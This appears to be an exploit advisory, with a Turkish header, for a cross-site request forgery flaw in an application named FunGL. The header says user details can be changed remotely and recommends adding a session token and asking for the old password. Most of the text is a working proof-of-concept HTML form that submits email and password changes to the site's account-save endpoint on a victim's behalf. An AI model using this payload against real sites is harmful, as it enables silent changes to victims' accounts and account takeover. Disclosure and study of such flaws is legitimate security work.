< ------------------- header data start ------------------- >

#############################################################

# Application Name :FunGL

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak user bilgileri degistirebilinir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >
< -- bug code start -- >
<form action=http://fungl.com/?page=account&action=usersave method=post>
<input disabled=disabled type=text name=user value=demo/><br/>
<input name=email type=text value=[email protected]/><br/>
<input name=password type=text/><br/>
<input name=projectamount disabled=disabled type=text value=1/><br/>
<input name=pollamount disabled=disabled type=text value=1/><br/>
<input type=submit name=saveuser value=Save/>
</form>
< -- bug code end of -- >